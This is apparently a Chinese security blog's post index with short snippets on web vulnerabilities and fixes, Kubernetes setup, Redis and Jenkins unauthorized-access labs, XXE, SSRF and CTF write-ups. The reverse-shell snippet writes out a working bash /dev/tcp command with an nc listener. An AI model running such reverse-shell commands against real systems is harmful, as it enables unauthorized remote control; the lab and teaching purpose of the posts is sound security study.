- 博客(23)
- 收藏
- 关注
RSS订阅原创 Web常见漏洞描述及修复建议详解--纯干货
1.SQL注入 漏洞描述Web程序中对于用户提交的参数未做过滤直接拼接到SQL语句中执行,导致参数中的特殊字符破坏了SQL语句原有逻辑,攻击者可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。修复建议代码层最佳防御sql漏洞方案:使用预编译sql语句查询和绑定变量。(1)使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL
2021-08-09 11:25:58
659
原创 十分钟部署Kubernetes dashboard配置(k8s页面)
十分钟部署Kubernetes dashboard配置(k8s页面)一、概述Kubernetes 简称为K8S,是用于自动部署,扩展和管理容器化应用程序的开源系统。Kubernetes的目标是让部署容器化的应用简单并且高效(powerful),Kubernetes提供了应用部署,规划,更新,维护的一种机制。现在的云平台,基本上都是基于k8s实现的。Kubernetes需要用到docker,应该说是Kubernetes本身就是对docker容器的管理。Docker 是一个开源的应用容器引擎
2021-06-02 18:05:11
1944
1
原创 十分钟快速简易安装一套k8s
k8s v1.19.7 快速安装一. k8s v1.19.7 快速安装本篇文章,安装大步骤如下:机器:三台1台master 2台node安装docker-ce(所有机器) 安装k8s机器设置(所有机器) 安装k8s v1.19.7mast管理节点 安装k8s v1.19.7node节点 安装flannel(master)我的环境:操作系统:win10 虚拟机:vmware linux发行版:CentOS7 linux内核(使用uname -r查看):3.10.0-1...
2021-05-31 18:43:38
1663
1
原创 linux提权 反弹shell的方法总结
实验环境CentOS 6.5:192.168.0.3kali2.0:192.168.0.4方法1:反弹shell命令如下:bash -i >& /dev/tcp/ip/port 0>&1首先,使用nc在kali上监听端口:nc -lvp 7777然后在CentOS6.5下输入:bash -i >& /dev/tcp/192.168.0.4/7777 0>&1 ...
2020-09-14 18:16:15
1425
原创 Redis 3.x 未授权访问漏洞复现
一、环境搭建1、下载安装rediswgethttp://download.redis.io/releases/redis-3.2.11.tar.gz2、 解压压缩包tarzxvfredis-3.2.11.tar.gz。3、进入解压目录redis-3.2.11 执行make命令4、 进入src目录 cd redis-3.2.11/src5、将redis-server和redis-cli拷贝到/usr/bin目录下(这样启动redis-server和redis-cli就不用每次都进入
2020-09-03 11:59:01
1089
原创 jenkins未授权访问漏洞复现
1安装jenkinswget http://download.baiyongjie.com/deploy/jdk-8u45-linux-x64.tar.gzwget http://download.baiyongjie.com/deploy/jenkins_2.121.2.warwget http://download.baiyongjie.com/deploy/apache-tomcat-8.5.4.tar.gz#安装jdktar zxvf jdk-8u45-linux-x64.ta.
2020-08-25 18:47:34
867
原创 burpsuite实现APP抓包(手机&模拟器)
实验环境:Win10burpsuitexiaomi/ 夜神模拟器(Android5.1)PC连接手机实现抓包(Android和ios都适用)让手机和PC使用同一个网络,使用电脑开启热点1、Win10右下角开启热点2、并让手机开启WiFi连接电脑开启的这个热点3、配置代理首先得知道热点的IP(这个IP是个虚拟的IP)也是这个IP分配地址给连接它的人使用,双击后点击详细信息可以看到它的IP,4、手机上配置代理点击wifi右边那个详情按钮查看热点详情进行配置,开启底下代理,代.
2020-07-15 23:08:53
5288
原创 DedeCMS 5.5靶机
实验内容步骤一:信息收集我们打开终端,输入firefox打开浏览器,访问网址就可以找到版本信息,在首页顶部和底部看到版本信息。192.168.0.2访问http://192.168.0.2/robots.txt也可以看见一些信息这个时候,我们就可以去网络上搜索一些dedecms v5.5版本的漏洞。dedecms v5.5版本存在一个任意文件上传,得到shell的...
2020-04-26 21:59:45
712
原创 逻辑漏洞-url跳转漏洞
CVE-2017-7233漏洞利用既然是url跳转漏洞,我们就需要让其跳转到指定的url里,https:2333333333这样的url明显是无法访问的,而冒号之后必须纯数字,http:127.0.0.1是无法pypass的。有什么方法呢?其实ip不仅只有常见的点分十进制表示法,纯十进制数字也可以表示一个ip地址,浏览器也同样支持。将IP的点分十进制,逐位转换为16进制然后拼接在一起转...
2020-04-25 12:42:36
1348
原创 XXE Lab渗透测试实战靶场
任务描述:信息收集。1. 首先查看kali机器IP地址: 10.1.1.912. 使用netdiscover扫描本地网络主机: # netdiscover -r 10.1.1.0/24 -r range:扫描给定范围而不是自动扫描。3. 使用nmap扫描目标ip: # nmap -sV -p 1-65535 10.1.1.93 ...
2020-04-23 23:46:33
3082
原创 XXE简介
1. 什么是XML xml: eXtensibleMarkup Language,可扩展标记语言,使用简单的标记来描述数据。 xml是一种非常灵活的语言,类似于HTML语言,但是并没有固定的标签,所有的标签都可以自定义,其设计的宗旨是传输数据,而不是像HTML一样显示数据。 xml不会做任何事情,它是被设计用来结构化、存储以及传输信息,也就是xml文件...
2020-04-23 21:05:03
1021
转载 Web常见漏洞描述及修复建议详解--纯干货
1.SQL注入 漏洞描述 Web程序中对于用户提交的参数未做过滤直接拼接到SQL语句中执行,导致参数中的特殊字符破坏了SQL语句原有逻辑,攻击者可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。 修复建议代码层最佳防御sql漏洞方案:使用预编译sql语句查询和绑定变量。 (1)使用预编译语句,使用PDO需要注意...
2020-03-23 10:33:30
1003
原创 干货!内网渗透测试之域渗透详解!收藏!
在渗透测试过程中,我们经常会遇到以下场景:某处于域中的服务器通过路由做端口映射,对外提供web服务,我们通过web脚本漏洞获得了该主机的system权限,如果甲方有进一步的内网渗透测试需求,以证明企业所面临的巨大风险,这个时候就需要做内网的域渗透。通常,我们是以获得域控制器的权限为目标,因为一旦域控制器沦陷,整个内网就尽在掌握中了,在学习域渗透之前,我们需要了解一些基础知识。一、什么是域...
2020-03-17 17:50:15
866
2
原创 浅谈SSRF
SSRF 简介SSRF,Server-Side Request Forgery,服务端请求伪造,是一种由攻击者构造形成由服务器端发起请求的一个漏洞。一般情况下,SSRF 攻击的目标是从外网无法访问的内部系统。漏洞形成的原因大多是因为服务端提供了从其他服务器应用获取数据的功能且没有对目标地址作过滤和限制。攻击者可以利用 SSRF 实现的攻击主要有 5 种:可以对外网、服务器所在内网...
2020-03-17 10:15:39
178
转载 HTTP返回码中301与302的区别
一.官方说法301,302都是HTTP状态的编码,都代表着某个URL发生了转移,不同之处在于:301redirect:301代表永久性转移(PermanentlyMoved)。302redirect:302代表暂时性转移(TemporarilyMoved)。这是很官方的说法,那么它们的区别到底是什么呢?二.现实中的差异2.1.对于用户301,302对用...
2020-03-09 20:15:44
767
原创 记Fckeditor漏洞
首先是对目标站点进行了基本的测试然后发现了存在fckeditor,fckeditor的漏洞有很多,基本asp的都被通杀了,大家可以在网上看看。首先看看编辑器的版本:$ http://xxxxxxx.com/fckeditor/editor/dialog/fck_about.html查看版本信息:版本信息可以看到是2.6.6的版本,那就对症下药。同时提一下,查看版...
2020-03-07 10:59:36
2197
原创 CTFHub-信息泄露-备份文件下载
第一题:目录遍历目录遍历漏洞,可以通过谷歌语法批量发现,如:intitle:Index of intext:Parent Directory在flag_in_here/2/1文件夹下发现flag.txt点击获得flag第二题PHPINFO这个算是低危的信息泄露,能够泄露一部分服务器的配置,比...
2020-03-06 18:04:19
3393
原创 PHP 面向对象
PHP 面向对象在面向对象的程序设计(英语:Object-oriented programming,缩写:OOP)中,对象是一个由信息及对信息进行处理的描述所组成的整体,是对现实世界的抽象。在现实世界里我们所面对的事情都是对象,如计算机、电视机、自行车等。对象的主要三个特性:对象的行为:可以对 对象施加那些操作,开灯,关灯就是行为。对象的形态:当施加那些方法是对象如何响应,颜色,尺寸,外...
2020-03-05 16:53:35
122
原创 PHP 字符串变量
PHP字符串变量一个字符串(string)就是由一系列的字符组成,其中每个字符等同于一个字节。字符串变量用于存储并处理文本。PHP 中的字符串变量字符串变量用于包含有字符的值。在创建字符串之后,我们就可以对它进行操作了。您可以直接在函数中使用字符串,或者把它存储在变量中。在下面的实例中,我们创建一个名为 txt 的字符串变量,并赋值为 "Hello world!" 。然后...
2020-03-05 09:30:21
240
原创 python 面向对象的__init__的理解
我们在学习python类的时候,总会碰见书上的类中有__init__()这样一个函数,很多同学百思不得其解,其实它就是python的构造方法。构造方法类似于类似init()这种初始化方法,来初始化新创建对象的状态,在一个对象呗创建以后会立即调用,比如像实例化一个类:f = FooBar()f.init()使用构造方法就能让它简化成如下形式:f = FooBar()你可能还没理解到底...
2020-01-06 14:10:41
92
原创 栅栏密码
密码学~栅栏密码Rail Fence Cipher即把将要传递的信息中的字母交替排成上下两行,再将下面一行字母排在上面一行的后边,从而形成一段密码。栅栏密码是一种置换密码。 例如密文:TEOGSDYUTAENNHLNETAMSHVAED 解密过程:先将密文分为两行 T E O G S D Y U T A E N N H L N E T A M S H V A E D 再按上...
2019-09-18 00:03:59
4004
原创 CTF-FTP服务后门利用
环境Kali ip 192.168.1.17SSH靶机ip 192.168.1.18FTP、File transfer protocol文件传输协议,同时它也是一个应用程序。下载和上传就是用这个协议。同样开始用netdiscover发现靶机ip后,用nmap探测开启的端口或服务。发现开启了ssh,http和ftp这三个服务。我们发现了ftp的版本号,我们可...
2019-06-01 14:25:13
872
原创 CTF-SSH私钥泄露
环境Kali ip 192.168.1.109SSH靶机ip 192.168.1.50x01信息探测 渗透其实是针对服务的漏洞检测,然后进行对应的数据包发送,获取机器的最高权限 nmap -sV 192.168.1.5 挖掘开放信息分析探测结果每一个服务对应计算机的一个端口,用来进行通信。常用的端口0~1023端口,在扫描结果中...
2019-05-29 13:39:38
494
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人